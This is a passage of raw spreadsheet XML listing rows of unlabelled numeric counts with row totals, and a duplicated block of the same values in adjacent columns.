        <v>70</v>
      </c>
      <c r="K23" s="7">
        <v>56</v>
      </c>
      <c r="L23" s="8">
        <v>25</v>
      </c>
      <c r="M23" s="8">
        <v>1</v>
      </c>
      <c r="N23" s="8">
        <v>33</v>
      </c>
      <c r="O23" s="8">
        <v>0</v>
      </c>
      <c r="P23" s="8">
        <v>2</v>
      </c>
      <c r="Q23" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="24" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A24" s="7">
        <v>57</v>
      </c>
      <c r="B24" s="8">
        <v>23</v>
      </c>
      <c r="C24" s="8">
        <v>1</v>
      </c>
      <c r="D24" s="8">
        <v>0</v>
      </c>
      <c r="E24" s="8">
        <v>2</v>
      </c>
      <c r="F24" s="8">
        <v>7</v>
      </c>
      <c r="G24" s="8">
        <v>3</v>
      </c>
      <c r="H24" s="8">
        <v>36</v>
      </c>
      <c r="K24" s="7">
        <v>57</v>
      </c>
      <c r="L24" s="8">
        <v>23</v>
      </c>
      <c r="M24" s="8">
        <v>1</v>
      </c>
      <c r="N24" s="8">
        <v>0</v>
      </c>
      <c r="O24" s="8">
        <v>2</v>
      </c>
      <c r="P24" s="8">
        <v>7</v>
      </c>
      <c r="Q24" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="25" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A25" s="7">
        <v>67</v>
      </c>
      <c r="B25" s="8">
        <v>26</v>
      </c>
      <c r="C25" s="8">
        <v>0</v>
      </c>
      <c r="D25" s="8">
        <v>17</v>
      </c>
      <c r="E25" s="8">
        <v>4</v>
      </c>
      <c r="F25" s="8">
        <v>10</v>
      </c>
      <c r="G25" s="8">
        <v>5</v>
      </c>
      <c r="H25" s="8">
        <v>62</v>
      </c>
      <c r="K25" s="7">
        <v>67</v>
      </c>
      <c r="L25" s="8">
        <v>26</v>
      </c>
      <c r="M25" s="8">
        <v>0</v>
      </c>
      <c r="N25" s="8">
        <v>17</v>
      </c>
      <c r="O25" s="8">
        <v>4</v>
      </c>
      <c r="P25" s="8">
        <v>10</v>
      </c>
      <c r="Q25" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="26" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A26" s="7">
        <v>80</v>
      </c>
      <c r="B26" s="8">
        <v>25</v>
      </c>
      <c r="C26" s="8">
        <v>0</v>
      </c>
      <c r="D26" s="8">
        <v>40</v>
      </c>
      <c r="E26" s="8">
        <v>5</v>
      </c>
      <c r="F26" s="8">
        <v>28</v>
      </c>
      <c r="G26" s="8">
        <v>6</v>
      </c>
      <c r="H26" s="8">
        <v>104</v>
      </c>
      <c r="K26" s="7">
        <v>80</v>
      </c>
      <c r="L26" s="8">
        <v>25</v>
      </c>
      <c r="M26" s="8">
        <v>0</v>
      </c>
      <c r="N26" s="8">
        <v>40</v>
      </c>
      <c r="O26" s="8">
        <v>5</v>
      </c>
      <c r="P26" s="8">
        <v>28</v>
      </c>
      <c r="Q26" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="27" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A27" s="7">
        <v>82</v>
      </c>
      <c r="B27" s="8">
        <v>25</v>
      </c>
      <c r="C27" s="8">
        <v>1</v>
      </c>
      <c r="D27" s="8">
        <v>37</v>
      </c>
      <c r="E27" s="8">
        <v>4</v>
      </c>
      <c r="F27" s="8">
        <v>66</v>
      </c>
      <c r="G27" s="8">
        <v>38</v>
      </c>
      <c r="H27" s="8">
        <v>171</v>
      </c>
      <c r="K27" s="7">
        <v>82</v>
      </c>
      <c r="L27" s="8">
        <v>25</v>
      </c>
      <c r="M27" s="8">
        <v>1</v>
      </c>
      <c r="N27" s="8">
        <v>37</v>
      </c>
      <c r="O27" s="8">
        <v>4</v>
      </c>
      <c r="P27" s="8">
        <v>66</v>
      </c>
      <c r="Q27" s="8">
        <v>38</v>
      </c>
    </row>
    <row r="28" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A28" s="7">
        <v>88</v>
      </c>
      <c r="B28" s="8">
        <v>26</v>
      </c>
      <c r="C28" s="8">
        <v>1</v>
      </c>
      <c r="D28" s="8">
        <v>63</v>
      </c>
      <c r="E28" s="8">
        <v>266</v>
      </c>
      <c r="F28" s="8">
        <v>2</v>
      </c>
      <c r="G28" s="8">
        <v>1</v>
      </c>
      <c r="H28" s="8">
        <v>359</v>
      </c>
      <c r="K28" s="7">
        <v>88</v>
      </c>
      <c r="L28" s="8">
        <v>26</v>
      </c>
      <c r="M28" s="8">
        <v>1</v>
      </c>
      <c r="N28" s="8">
        <v>63</v>
      </c>
      <c r="O28" s="8">
        <v>266</v>
      </c>
      <c r="P28" s="8">
        <v>2</v>
      </c>
      <c r="Q28" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A29" s="7">
        <v>91</v>
      </c>
      <c r="B29" s="8">
        <v>0</v>
      </c>
      <c r="C29" s="8">
        <v>0</v>
      </c>
      <c r="D29" s="8">
        <v>7</v>
      </c>
      <c r="E29" s="8">
        <v>0</v>
      </c>
      <c r="F29" s="8">
        <v>10</v>
      </c>
      <c r="G29" s="8">
        <v>0</v>
      </c>
      <c r="H29" s="8">
        <v>17</v>
      </c>
      <c r="K29" s="7">
        <v>91</v>
      </c>
      <c r="L29" s="8">
        <v>0</v>
      </c>
      <c r="M29" s="8">
        <v>0</v>
      </c>
      <c r="N29" s="8">
        <v>7</v>
      </c>
      <c r="O29" s="8">
        <v>0</v>
      </c>
      <c r="P29" s="8">
        <v>10</v>
      </c>
      <c r="Q29" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A30" s="7">
        <v>92</v>
      </c>
      <c r="B30" s="8">
        <v>0</v>
      </c>
      <c r="C30" s="8">
        <v>0</v>
      </c>
      <c r="D30" s="8">
        <v>0</v>
      </c>
      <c r="E30" s="8">
        <v>0</v>
      </c>
      <c r="F30" s="8">
        <v>3</v>
      </c>
      <c r="G30" s="8">
        <v>4</v>
      </c>
      <c r="H30" s="8">
        <v>7</v>
      </c>
      <c r="K30" s="7">
        <v>92</v>
      </c>
      <c r="L30" s="8">
        <v>0</v>
      </c>
      <c r="M30" s="8">
        <v>0</v>
      </c>
      <c r="N30" s="8">
        <v>0</v>
      </c>
      <c r="O30" s="8">
        <v>0</v>
      </c>
      <c r="P30" s="8">
        <v>3</v>
      </c>
      <c r="Q30" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="31" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A31" s="7">
        <v>102</v>
      </c>
      <c r="B31" s="8">
        <v>6</v>
      </c>
      <c r="C31" s="8">
        <v>1</v>
      </c>
      <c r="D31" s="8">
        <v>7</v>
      </c>
      <c r="E31" s="8">
        <v>0</v>
      </c>
      <c r="F31" s="8">
        <v>7</v>
      </c>
      <c r="G31" s="8">
        <v>7</v>
      </c>
      <c r="H31" s="8">
        <v>28</v>
      </c>
      <c r="K31" s="7">
        <v>102</v>
      </c>
      <c r="L31" s="8">
        <v>6</v>
      </c>
      <c r="M31" s="8">
        <v>1</v>
      </c>
      <c r="N31" s="8">
        <v>7</v>
      </c>
      <c r="O31" s="8">
        <v>0</v>
      </c>
      <c r="P31" s="8">
        <v>7</v>
      </c>
      <c r="Q31" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="32" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A32" s="7">
        <v>108</v>
      </c>
      <c r="B32" s="8">
        <v>6</v>
      </c>
      <c r="C32" s="8">
        <v>1</v>
      </c>
      <c r="D32" s="8">
        <v>0</v>
      </c>
      <c r="E32" s="8">
        <v>0</v>
      </c>
      <c r="F32" s="8">
        <v>103</v>
      </c>
      <c r="G32" s="8">
        <v>54</v>
      </c>
      <c r="H32" s="8">
        <v>164</v>
      </c>
      <c r="K32" s="7">
        <v>108</v>
      </c>
      <c r="L32" s="8">
        <v>6</v>
      </c>
      <c r="M32" s="8">
        <v>1</v>
      </c>
      <c r="N32" s="8">
        <v>0</v>
      </c>
      <c r="O32" s="8">
        <v>0</v>
      </c>
      <c r="P32" s="8">
        <v>103</v>
      </c>
      <c r="Q32" s="8">
        <v>54</v>
      </c>
    </row>
    <row r="33" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A33" s="7">
        <v>110</v>
      </c>
      <c r="B33" s="8">
        <v>24</v>
      </c>
      <c r="C33" s="8">
        <v>1</v>
      </c>
      <c r="D33" s="8">
        <v>27</v>
      </c>
      <c r="E33" s="8">
        <v>4</v>
      </c>
      <c r="F33" s="8">
        <v>14</v>
      </c>
      <c r="G33" s="8">
        <v>3</v>
      </c>
      <c r="H33" s="8">
        <v>73</v>
      </c>
      <c r="K33" s="7">
        <v>110</v>
      </c>
      <c r="L33" s="8">
        <v>24</v>
      </c>
      <c r="M33" s="8">
        <v>1</v>
      </c>
      <c r="N33" s="8">
        <v>27</v>
      </c>
      <c r="O33" s="8">
        <v>4</v>
      </c>
      <c r="P33" s="8">
        <v>14</v>
      </c>
      <c r="Q33" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="34" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A34" s="7">
        <v>111</v>
      </c>
      <c r="B34" s="8">
        <v>26</v>
      </c>
      <c r="C34" s="8">
        <v>0</v>
      </c>
      <c r="D34" s="8">
        <v>0</v>
      </c>
      <c r="E34" s="8">
        <v>0</v>
      </c>
      <c r="F34" s="8">
        <v>37</v>
      </c>
      <c r="G34" s="8">
        <v>3</v>
      </c>
      <c r="H34" s="8">
        <v>66</v>
      </c>
      <c r="K34" s="7">
        <v>111</v>
      </c>
      <c r="L34" s="8">
        <v>26</v>
      </c>
      <c r="M34" s="8">
        <v>0</v>
      </c>
      <c r="N34" s="8">
        <v>0</v>
      </c>
      <c r="O34" s="8">
        <v>0</v>
      </c>
      <c r="P34" s="8">
        <v>37</v>
      </c>
      <c r="Q34" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="35" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A35" s="7">
        <v>112</v>
      </c>
      <c r="B35" s="8">
        <v>26</v>
      </c>
      <c r="C35" s="8">
        <v>0</v>
      </c>
      <c r="D35" s="8">
        <v>0</v>
      </c>
      <c r="E35" s="8">
        <v>0</v>
      </c>
      <c r="F35" s="8">
        <v>15</v>
      </c>
      <c r="G35" s="8">
        <v>4</v>
      </c>
      <c r="H35" s="8">
        <v>45</v>
      </c>
      <c r="K35" s="7">
        <v>112</v>
      </c>
      <c r="L35" s="8">
        <v>26</v>
      </c>
      <c r="M35" s="8">
        <v>0</v>
      </c>
      <c r="N35" s="8">
        <v>0</v>
      </c>
      <c r="O35" s="8">
        <v>0</v>
      </c>
      <c r="P35" s="8">
        <v>15</v>
      </c>
      <c r="Q35" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="36" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A36" s="7">
        <v>114</v>
      </c>
      <c r="B36" s="8">
        <v>26</v>
      </c>
      <c r="C36" s="8">
        <v>1</v>
      </c>
      <c r="D36" s="8">
        <v>22</v>
      </c>
      <c r="E36" s="8">
        <v>33</v>
      </c>
      <c r="F36" s="8">
        <v>5</v>
      </c>
      <c r="G36" s="8">
        <v>5</v>
      </c>
      <c r="H36" s="8">
        <v>92</v>
      </c>
      <c r="K36" s="7">
        <v>114</v>
      </c>
      <c r="L36" s="8">
        <v>26</v>
      </c>
      <c r="M36" s="8">
        <v>1</v>
      </c>
      <c r="N36" s="8">
        <v>22</v>
      </c>
      <c r="O36" s="8">
        <v>33</v>
      </c>
      <c r="P36" s="8">
        <v>5</v>
      </c>
      <c r="Q36" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="37" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A37" s="7">
        <v>117</v>
      </c>
      <c r="B37" s="8">
        <v>49</v>
      </c>
      <c r="C37" s="8">
        <v>0</v>
      </c>
      <c r="D37" s="8">
        <v>0</v>
      </c>
      <c r="E37" s="8">
        <v>0</v>
      </c>
      <c r="F37" s="8">
        <v>45</v>
      </c>
      <c r="G37" s="8">
        <v>37</v>
      </c>
      <c r="H37" s="8">
        <v>131</v>
      </c>
      <c r="K37" s="7">
        <v>117</v>
      </c>
      <c r="L37" s="8">
        <v>49</v>
      </c>
      <c r="M37" s="8">
        <v>0</v>
      </c>
      <c r="N37" s="8">
        <v>0</v>
      </c>
      <c r="O37" s="8">
        <v>0</v>
      </c>
      <c r="P37" s="8">
        <v>45</v>
      </c>
      <c r="Q37" s="8">
        <v>37</v>
      </c>
    </row>
    <row r="38" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A38" s="7">
        <v>119</v>
      </c>
      <c r="B38" s="8">
        <v>25</v>
      </c>
      <c r="C38" s="8">
        <v>1</v>
      </c>
      <c r="D38" s="8">
        <v>5</v>
      </c>
      <c r="E38" s="8">
        <v>25</v>
      </c>
      <c r="F38" s="8">
        <v>12</v>
      </c>
      <c r="G38" s="8">
        <v>3</v>
      </c>
      <c r="H38" s="8">
        <v>71</v>
      </c>
      <c r="K38" s="7">
        <v>119</v>
      </c>
      <c r="L38" s="8">
        <v>25</v>
      </c>
      <c r="M38" s="8">
        <v>1</v>
      </c>
      <c r="N38" s="8">
        <v>5</v>
      </c>
      <c r="O38" s="8">
        <v>25</v>
      </c>
      <c r="P38" s="8">
        <v>12</v>
      </c>
      <c r="Q38" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="39" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A39" s="7">
        <v>124</v>
      </c>
      <c r="B39" s="8">
        <v>0</v>
      </c>
      <c r="C39" s="8">
        <v>0</v>
      </c>
      <c r="D39" s="8">
        <v>0</v>
      </c>
      <c r="E39" s="8">
        <v>0</v>
      </c>
      <c r="F39" s="8">
        <v>38</v>
      </c>
      <c r="G39" s="8">
        <v>22</v>
      </c>
      <c r="H39" s="8">
        <v>60</v>
      </c>
      <c r="K39" s="7">
        <v>124</v>
      </c>
      <c r="L39" s="8">
        <v>0</v>
      </c>
      <c r="M39" s="8">
        <v>0</v>
      </c>
      <c r="N39" s="8">
        <v>0</v>
      </c>
      <c r="O39" s="8">
        <v>0</v>
      </c>
      <c r="P39" s="8">
        <v>38</v>
      </c>
      <c r="Q39" s="8">
        <v>22</v>
      </c>
    </row>
    <row r="40" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A40" s="7">
        <v>128</v>
      </c>
      <c r="B40" s="8">
        <v>26</v>
      </c>
      <c r="C40" s="8">
        <v>1</v>
      </c>
      <c r="D40" s="8">
        <v>20</v>
      </c>
      <c r="E40" s="8">
        <v>0</v>
      </c>
      <c r="F40" s="8">
        <v>22</v>
      </c>
      <c r="G40" s="8">
        <v>1</v>
      </c>
      <c r="H40" s="8">
        <v>70</v>
      </c>
      <c r="K40" s="7">
        <v>128</v>
      </c>
      <c r="L40" s="8">
        <v>26</v>
      </c>
      <c r="M40" s="8">
        <v>1</v>
      </c>
      <c r="N40" s="8">
        <v>20</v>
      </c>
      <c r="O40" s="8">
        <v>0</v>
      </c>
      <c r="P40" s="8">
        <v>22</v>
      </c>
      <c r="Q40" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A41" s="7">
        <v>131</v>
      </c>
      <c r="B41" s="8">
        <v>24</v>
      </c>
      <c r="C41" s="8">
        <v>1</v>
      </c>
      <c r="D41" s="8">
        <v>21</v>
      </c>
      <c r="E41" s="8">
        <v>2</v>
      </c>
      <c r="F41" s="8">
        <v>17</v>
      </c>
      <c r="G41" s="8">
        <v>4</v>
      </c>
      <c r="H41" s="8">
        <v>69</v>
      </c>
      <c r="K41" s="7">
        <v>131</v>
      </c>
      <c r="L41" s="8">
        <v>24</v>
      </c>
      <c r="M41" s="8">
        <v>1</v>
      </c>
      <c r="N41" s="8">
        <v>21</v>
      </c>
      <c r="O41" s="8">
        <v>2</v>
      </c>
      <c r="P41" s="8">
        <v>17</v>
      </c>
      <c r="Q41" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="42" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A42" s="7">
        <v>133</v>
      </c>
      <c r="B42" s="8">
        <v>24</v>
      </c>
      <c r="C42" s="8">
        <v>0</v>
      </c>
      <c r="D42" s="8">
        <v>6</v>
      </c>
      <c r="E42" s="8">
        <v>0</v>
      </c>
      <c r="F42" s="8">
        <v>16</v>
      </c>
      <c r="G42" s="8">
        <v>115</v>
      </c>
      <c r="H42" s="8">
        <v>161</v>
      </c>
      <c r="K42" s="7">
        <v>133</v>
      </c>
      <c r="L42" s="8">
        <v>24</v>
      </c>
      <c r="M42" s="8">
        <v>0</v>
      </c>
      <c r="N42" s="8">
        <v>6</v>
      </c>
      <c r="O42" s="8">
        <v>0</v>
      </c>
      <c r="P42" s="8">
        <v>16</v>
      </c>
      <c r="Q42" s="8">
        <v>115</v>
      </c>
    </row>
    <row r="43" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A43" s="7">
        <v>137</v>
      </c>
      <c r="B43" s="8">
        <v>25</v>
      </c>
      <c r="C43" s="8">
        <v>1</v>
      </c>
      <c r="D43" s="8">
        <v>4</v>
      </c>
      <c r="E43" s="8">
        <v>38</v>
      </c>
      <c r="F43" s="8">
        <v>16</v>
      </c>
      <c r="G43" s="8">
        <v>22</v>
      </c>
      <c r="H43" s="8">
        <v>106</v>
      </c>
      <c r="K43" s="7">
        <v>137</v>
      </c>
      <c r="L43" s="8">
        <v>25</v>
      </c>
      <c r="M43" s="8">
        <v>1</v>
      </c>
      <c r="N43" s="8">
        <v>4</v>
      </c>
      <c r="O43" s="8">
        <v>38</v>
      </c>
      <c r="P43" s="8">
        <v>16</v>
      </c>
      <c r="Q43" s="8">
        <v>22</v>
      </c>
    </row>
    <row r="44" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A44" s="7">
        <v>138</v>
      </c>
      <c r="B44" s="8">
        <v>22</v>
      </c>
      <c r="C44" s="8">
        <v>1</v>
      </c>
      <c r="D44" s="8">
        <v>11</v>
      </c>
      <c r="E44" s="8">
        <v>2</v>
      </c>
      <c r="F44" s="8">
        <v>17</v>
      </c>
      <c r="G44" s="8">
        <v>4</v>
      </c>
      <c r="H44" s="8">
        <v>57</v>
      </c>
      <c r="K44" s="7">
        <v>138</v>
      </c>
      <c r="L44" s="8">
        <v>22</v>
      </c>
      <c r="M44" s="8">
        <v>1</v>
      </c>
      <c r="N44" s="8">
        <v>11</v>
      </c>
      <c r="O44" s="8">
        <v>2</v>
      </c>
      <c r="P44" s="8">
        <v>17</v>
      </c>
      <c r="Q44" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="45" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A45" s="7">
        <v>142</v>
      </c>
      <c r="B45" s="8">
        <v>22</v>
      </c>
      <c r="C45" s="8">
        <v>3</v>
      </c>
      <c r="D45" s="8">
        <v>2</v>
      </c>
      <c r="E45" s="8">
        <v>0</v>
      </c>
      <c r="F45" s="8">
        <v>15</v>
      </c>
      <c r="G45" s="8">
        <v>1</v>
      </c>
      <c r="H45" s="8">
        <v>43</v>
      </c>
      <c r="K45" s="7">
        <v>142</v>
      </c>
      <c r="L45" s="8">
        <v>22</v>
      </c>
      <c r="M45" s="8">
        <v>3</v>
      </c>
      <c r="N45" s="8">
        <v>2</v>
      </c>
      <c r="O45" s="8">
        <v>0</v>
      </c>
      <c r="P45" s="8">
        <v>15</v>
      </c>
      <c r="Q45" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A46" s="7">
        <v>145</v>
      </c>
      <c r="B46" s="8">
        <v>5</v>
      </c>
      <c r="C46" s="8">
        <v>1</v>
      </c>
      <c r="D46" s="8">
        <v>2</v>
      </c>
      <c r="E46" s="8">
        <v>0</v>
      </c>
      <c r="F46" s="8">
        <v>4</v>
      </c>
      <c r="G46" s="8">
        <v>5</v>
      </c>
      <c r="H46" s="8">
        <v>17</v>
      </c>
      <c r="K46" s="7">
        <v>145</v>
      </c>
      <c r="L46" s="8">
        <v>5</v>
      </c>
      <c r="M46" s="8">
        <v>1</v>
      </c>
      <c r="N46" s="8">
        <v>2</v>
      </c>
      <c r="O46" s="8">
        <v>0</v>
      </c>
      <c r="P46" s="8">
        <v>4</v>
      </c>
      <c r="Q46" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="47" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A47" s="7">
        <v>149</v>
      </c>
      <c r="B47" s="8">
        <v>5</v>
      </c>
      <c r="C47" s="8">
        <v>2</v>
      </c>
      <c r="D47" s="8">
        <v>2</v>
      </c>
      <c r="E47" s="8">
        <v>0</v>
      </c>
      <c r="F47" s="8">
        <v>2</v>
      </c>
      <c r="G47" s="8">
        <v>0</v>
      </c>
      <c r="H47" s="8">
        <v>11</v>
      </c>
      <c r="K47" s="7">
        <v>149</v>
      </c>
      <c r="L47" s="8">
        <v>5</v>
      </c>
      <c r="M47" s="8">
        <v>2</v>
      </c>
      <c r="N47" s="8">
        <v>2</v>
      </c>
      <c r="O47" s="8">
        <v>0</v>
      </c>
      <c r="P47" s="8">
        <v>2</v>
      </c>
      <c r="Q47" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A48" s="7">
        <v>155</v>
      </c>
      <c r="B48" s="8">
        <v>0</v>
      </c>
      <c r="C48" s="8">
        <v>0</v>
      </c>
      <c r="D48" s="8">
        <v>0</v>
      </c>
      <c r="E48" s="8">
        <v>10</v>
      </c>
      <c r="F48" s="8">
        <v>0</v>
      </c>
      <c r="G48" s="8">
        <v>0</v>
      </c>
      <c r="H48" s="8">
        <v>10</v>
      </c>
      <c r="K48" s="7">
        <v>155</v>
      </c>
      <c r="L48" s="8">
        <v>0</v>
      </c>
      <c r="M48" s="8">
        <v>0</v>
      </c>
      <c r="N48" s="8">
        <v>0</v>
      </c>
      <c r="O48" s="8">
        <v>10</v>
      </c>
      <c r="P48" s="8">
        <v>0</v>
      </c>
      <c r="Q48" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A49" s="7">
        <v>159</v>
      </c>
      <c r="B49" s="8">
        <v>26</v>
      </c>
      <c r="C49" s="8">
        <v>0</v>
      </c>
      <c r="D49" s="8">
        <v>30</v>
      </c>
      <c r="E49" s="8">
        <v>0</v>
      </c>
      <c r="F49" s="8">
        <v>40</v>
      </c>
      <c r="G49" s="8">
        <v>60</v>
      </c>
      <c r="H49" s="8">
        <v>156</v>
      </c>
      <c r="K49" s="7">
        <v>159</v>
      </c>
      <c r="L49" s="8">
        <v>26</v>
      </c>
      <c r="M49" s="8">
        <v>0</v>
      </c>
      <c r="N49" s="8">
        <v>30</v>
      </c>
      <c r="O49" s="8">
        <v>0</v>
      </c>
      <c r="P49" s="8">
        <v>40</v>
      </c>
      <c r="Q49" s="8">
        <v>60</v>
      </c>
    </row>
    <row r="50" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A50" s="7">
        <v>160</v>
      </c>
      <c r="B50" s="8">
        <v>26</v>
      </c>
      <c r="C50" s="8">
        <v>0</v>
      </c>
      <c r="D50" s="8">
        <v>2</v>
      </c>
      <c r="E50" s="8">
        <v>8</v>
      </c>
      <c r="F50" s="8">
        <v>9</v>
      </c>
      <c r="G50" s="8">
        <v>10</v>
      </c>
      <c r="H50" s="8">
        <v>55</v>
      </c>
      <c r="K50" s="7">
        <v>160</v>
      </c>
      <c r="L50" s="8">
        <v>26</v>
      </c>
      <c r="M50" s="8">
        <v>0</v>
      </c>
      <c r="N50" s="8">
        <v>2</v>
      </c>
      <c r="O50" s="8">
        <v>8</v>
      </c>
      <c r="P50" s="8">
        <v>9</v>
      </c>
      <c r="Q50" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="51" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A51" s="7">
        <v>161</v>
      </c>
      <c r="B51" s="8">
        <v>27</v>
      </c>
      <c r="C51" s="8">
        <v>0</v>
      </c>
      <c r="D51" s="8">
        <v>3</v>
      </c>
      <c r="E51" s="8">
        <v>0</v>
      </c>
      <c r="F51" s="8">
        <v>2</v>
      </c>
      <c r="G51" s="8">
        <v>2</v>
      </c>
      <c r="H51" s="8">
        <v>34</v>
      </c>
      <c r="K51" s="7">
        <v>161</v>
      </c>
      <c r="L51" s="8">
        <v>27</v>
      </c>
      <c r="M51" s="8">
        <v>0</v>
      </c>
      <c r="N51" s="8">
        <v>3</v>
      </c>
      <c r="O51" s="8">
        <v>0</v>
      </c>
      <c r="P51" s="8">
        <v>2</v>
      </c>
      <c r="Q51" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="52" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A52" s="7">
        <v>162</v>
      </c>
      <c r="B52" s="8">
        <v>0</v>
      </c>
      <c r="C52" s="8">
        <v>0</v>
      </c>
      <c r="D52" s="8">
        <v>30</v>
      </c>
      <c r="E52" s="8">
        <v>15</v>
      </c>
      <c r="F52" s="8">
        <v>15</v>
      </c>
      <c r="G52" s="8">
        <v>5</v>
      </c>
      <c r="H52" s="8">
        <v>65</v>
      </c>
      <c r="K52" s="7">
        <v>162</v>
      </c>
      <c r="L52" s="8">
        <v>0</v>
      </c>
      <c r="M52" s="8">
        <v>0</v>
      </c>
      <c r="N52" s="8">
        <v>30</v>
      </c>
      <c r="O52" s="8">
        <v>15</v>
      </c>
      <c r="P52" s="8">
        <v>15</v>
      </c>
      <c r="Q52" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="53" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A53" s="7">
        <v>163</v>
      </c>
      <c r="B53" s="8">
        <v>26</v>
      </c>
      <c r="C53" s="8">
        <v>3</v>
      </c>
      <c r="D53" s="8">
        <v>0</v>
      </c>
      <c r="E53" s="8">
        <v>0</v>
      </c>
      <c r="F53" s="8">
        <v>46</v>
      </c>
      <c r="G53" s="8">
        <v>107</v>
      </c>
      <c r="H53" s="8">
        <v>182</v>
      </c>
      <c r="K53" s="7">
        <v>163</v>
      </c>
      <c r="L53" s="8">
        <v>26</v>
      </c>
      <c r="M53" s="8">
        <v>3</v>
      </c>
      <c r="N53" s="8">
        <v>0</v>
      </c>
      <c r="O53" s="8">
        <v>0</v>
      </c>
      <c r="P53" s="8">
        <v>46</v>
      </c>
      <c r="Q53" s="8">
        <v>107</v>
      </c>
    </row>
    <row r="54" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A54" s="7">
        <v>166</v>
      </c>
      <c r="B54" s="8">
        <v>26</v>
      </c>
      <c r="C54" s="8">
        <v>1</v>
      </c>
      <c r="D54" s="8">
        <v>3</v>
      </c>
      <c r="E54" s="8">
        <v>0</v>
      </c>
      <c r="F54" s="8">
        <v>3</v>
      </c>
      <c r="G54" s="8">
        <v>0</v>
      </c>
      <c r="H54" s="8">
        <v>33</v>
      </c>
      <c r="K54" s="7">
        <v>166</v>
      </c>
      <c r="L54" s="8">
        <v>26</v>
      </c>
      <c r="M54" s="8">
        <v>1</v>
      </c>
      <c r="N54" s="8">
        <v>3</v>
      </c>
      <c r="O54" s="8">
        <v>0</v>
      </c>
      <c r="P54" s="8">
        <v>3</v>
      </c>
      <c r="Q54" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A55" s="7">
        <v>170</v>
      </c>
      <c r="B55" s="8">
        <v>26</v>
      </c>
      <c r="C55" s="8">
        <v>0</v>
      </c>
      <c r="D55" s="8">
        <v>10</v>
      </c>
      <c r="E55" s="8">
        <v>10</v>
      </c>
      <c r="F55" s="8">
        <v>15</v>
      </c>
      <c r="G55" s="8">
        <v>10</v>
      </c>
      <c r="H55" s="8">
        <v>71</v>
      </c>
      <c r="K55" s="7">
        <v>170</v>
      </c>
      <c r="L55" s="8">
        <v>26</v>
      </c>
      <c r="M55" s="8">
        <v>0</v>
      </c>
      <c r="N55" s="8">
        <v>10</v>
      </c>
      <c r="O55" s="8">
        <v>10</v>
      </c>
      <c r="P55" s="8">
        <v>15</v>
      </c>
      <c r="Q55" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="56" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A56" s="7">
        <v>174</v>
      </c>
      <c r="B56" s="8">
        <v>6</v>
      </c>
      <c r="C56" s="8">
        <v>1</v>
      </c>
      <c r="D56" s="8">
        <v>19</v>
      </c>
      <c r="E56" s="8">
        <v>30</v>
      </c>
      <c r="F56" s="8">
        <v>10</v>
      </c>
      <c r="G56" s="8">
        <v>22</v>
      </c>
      <c r="H56" s="8">
        <v>88</v>
      </c>
      <c r="K56" s="7">
        <v>174</v>
      </c>
      <c r="L56" s="8">
        <v>6</v>
      </c>
      <c r="M56" s="8">
        <v>1</v>
      </c>
      <c r="N56" s="8">
        <v>19</v>
      </c>
      <c r="O56" s="8">
        <v>30</v>
      </c>
      <c r="P56" s="8">
        <v>10</v>
      </c>
      <c r="Q56" s="8">
        <v>22</v>
      </c>
    </row>
    <row r="57" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A57" s="7">
        <v>175</v>
      </c>
      <c r="B57" s="8">
        <v>0</v>
      </c>
      <c r="C57" s="8">
        <v>0</v>
      </c>
      <c r="D57" s="8">
        <v>30</v>
      </c>
      <c r="E57" s="8">
        <v>22</v>
      </c>
      <c r="F57" s="8">
        <v>4</v>
      </c>
      <c r="G57" s="8">
        <v>3</v>
      </c>
      <c r="H57" s="8">
